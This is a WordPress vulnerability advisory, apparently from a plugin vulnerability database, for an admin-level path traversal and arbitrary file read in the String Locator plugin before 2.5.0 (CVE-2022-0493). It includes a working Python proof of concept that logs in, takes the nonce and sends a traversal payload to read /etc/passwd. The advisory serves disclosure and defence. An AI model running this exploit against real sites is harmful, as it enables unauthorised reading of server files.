WordPress Plugin Vulnerabilities

String Locator < 2.5.0 - Admin+ Arbitrary File Read

Description

The plugin does not properly validate the path of the files to be searched, allowing high privilege users such as admin to query arbitrary files on the web server via a path traversal vector. Furthermore, due to a flaw in the search, allowing a pattern to be provided, which will be used to output the relevant matches from the matching file, all content of the file can be disclosed.

Note: The attack does not work on multisite (as admin), or when FILE_MODS is disallowed, but works when only FILE_EDIT is disallowed. Furthermore, admins should be restricted to file inside the blog, not arbitrary ones on the web server.

Proof of Concept

import requests, re

BASE_URL = "http://localhost:8000"
id = "wordpress"
pw = "wordpress"

FILENAME = "/etc/passwd"
FIND_KEYWORD = "/.*/i"

def filter(text) :
    cleanr =re.compile('<.*?>')
    cleantext = re.sub(cleanr, '', text)
    cleantext = cleantext.replace("…", "")
    return cleantext

def login(id, pw) :
    # Phase : Login (because, we need a nonce value)
    sess = requests.Session()
    sess.post(
        BASE_URL + "/wp-login.php",
        data = {
            'log': id,
            'pwd': pw,
            'wp-submit': '%EB%A1%9C%EA%B7%B8%EC%9D%B8',
            'testcookie': '1'
        }
    ).text
    
    return sess


def exploit(sess) :
    # Phase : Get nonce value
    res = sess.get(f"{BASE_URL}/wp-admin/tools.php?page=string-locator")
    res = res.text
    res = res[res.find('search_nonce"'):][15:]
    nonce = res[:res.find('"')]

    # Phase : Attack !
    res = sess.post(
        f"{BASE_URL}/wp-admin/admin-ajax.php",
        headers =  {"Content-Type": "application/x-www-form-urlencoded"},
        data = {
            "action" : "string-locator-get-directory-structure",
            "directory" : f"t-../../../../../../../{FILENAME}",
            "search" : f"{FIND_KEYWORD}",
            "regex" : "true",
            "nonce" : nonce
        },
        proxies = {"http": "http://localhost:8080"}
    )
    
    if res.json()["success"] == True :
        res = sess.post(
            f"{BASE_URL}/wp-admin/admin-ajax.php",
            headers =  {"Content-Type": "application/x-www-form-urlencoded"},
            data = {
                "action" : "string-locator-search",   
                "filenum" : "0",
                "nonce" : nonce
            },
            proxies = {"http": "http://localhost:8080"}
        )
        # print(res.text)

        for line in res.json()["data"]["search"][0][1:] : 
            print(filter(line['stringresult']))


sess = login(id, pw)
exploit(sess)

Affects Plugins

Plugin icon
string-locator
Fixed in 2.5.0

References

CVE
CVE-2022-0493
URL
https://plugins.trac.wordpress.org/changeset/2685592

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
2.7 (low)

Miscellaneous

Original Researcher
qerogram
Submitter
qerogram
Submitter website
https://github.com/qerogram
Verified
Yes
WPVDB ID
21e2e5fc-03d2-4791-beef-07af6bf985ed

Timeline

Publicly Published
2022-03-01 (about 2 years ago)
Added
2022-03-01 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2022-05-16
Title
User Meta < 2.4.4 - Subscriber+ Local File Enumeration via Path Traversal
Published
2019-07-23
Title
WPS Child Themes Generator <= 1.1 - Path Traversal
Published
2015-08-28
Title
NextGen Gallery < 2.1.15 - Path Traversal
Published
2022-08-24
Title
Ajax Load More < 5.5.4.1 - Admin+ Arbitrary File Read
Published
2021-12-14
Title
True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal